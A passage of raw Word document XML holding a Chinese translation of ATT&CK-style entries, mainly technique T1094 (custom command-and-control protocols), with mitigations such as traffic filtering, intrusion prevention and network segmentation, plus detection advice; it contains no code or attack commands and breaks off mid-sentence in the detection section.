          <w:p w14:paraId="28EC4948" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId236" w:history="1">
              <w:r w:rsidR="0038171C" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BC413A5" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。签名通常是协议中的唯一指示符，可能基于攻击者或工具的特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>协议，并且在各种恶意软件系列和版本中可能会有所不同。攻击者可能会随着时间的推移更改工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名，或者构建协议</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>来逃避常见防御工具的检测。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31FA1D40" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6340F6CA" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E489BB8" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00360523">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>网络活动</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>需要用户指挥的进程中</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>驱动的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，则是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528AB0BE" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00360523">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络数据中不常见的数据流（例如，一个客户端发送的数据比从服务器接收的数据要多得多，或者一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>客户端给另外一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应该或经常不相互通信的客户端发送了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF0387" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="0038171C" w:rsidRDefault="0038171C" w:rsidP="00360523"/>
    <w:p w14:paraId="58FD9F55" w14:textId="7B933EF9" w:rsidR="00A0413E" w:rsidRDefault="00F743F9" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>自定义</w:t>
      </w:r>
      <w:r w:rsidR="005A13EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidR="005A13EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="60C88997" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D655E6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F34FA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F34FA3">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:t xml:space="preserve"> T1094</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DAA201C" w14:textId="01F28C37" w:rsidR="00A0413E" w:rsidRPr="00F34FA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029EBDEC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F34FA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F34FA3">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE8C201" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F34FA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F34FA3">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，进程网络访问，进程监控，主机网络接口，网络入侵检测系统，网络协议分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62676DD7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F34FA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34EDBAE8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F34FA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F34FA3">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:t>: Ryan Becwar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F281C0B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F34FA3">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F34FA3">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08535D85" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00212D65" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01376DDE" w14:textId="1B7C8579" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议进行通信，而不是在现有的标准应用层协议中封装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括模仿众所周知的协议或在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP / IP /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其它</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准网络堆栈提供的基本协议之上开发自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议（包括原始套接字）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E9A1E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F34FA3" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="42E475C6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="01EB3AC8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="383ACD58" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="003C13F0" w14:paraId="3004FACC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5186FE60" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤网络流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D993B9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤网络流量以查找异常或非标准协议。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="003C13F0" w14:paraId="727E9FDC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="1276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A162EBD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500BDF34" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络签名来识别特定恶意软件的流量的网络入侵检测和防御系统可用于缓解网络级别的活动。</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名通常是用于协议内的唯一识别符，并且是基于特定对手或工具使用的特定协议，并且可能在各种恶意软件系列和版本之间不同。</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可能会随着时间的推移改变工具</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名，或者以避免共同防御工具检测的方式构建协议。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="003C13F0" w14:paraId="2E8794E9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="798"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC7B02E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DBEDF41" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>正确配置防火墙和代理，以限制仅通过必要端口和适当的网络网关系统的传出流量。</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>还要确保仅配置主机以通过授权接口进行通信。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22686F62" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F47217" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B85DA0C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790AB0DC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F47217" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息或包含异常数据的其他协议的网络流量，或者通常在网络内部或网络中看不到的网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FD219" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F47217" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析不常见数据流的网络数据（例如，客户端发送的数据明显多于从服务器接收的数据）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用通常不具有网络通信或从未见过的网络的过程是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容以检测不遵循正在使用的端口的预期协议行为的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079BCB66" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查与启用和利用备用通信通道相关的功能的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
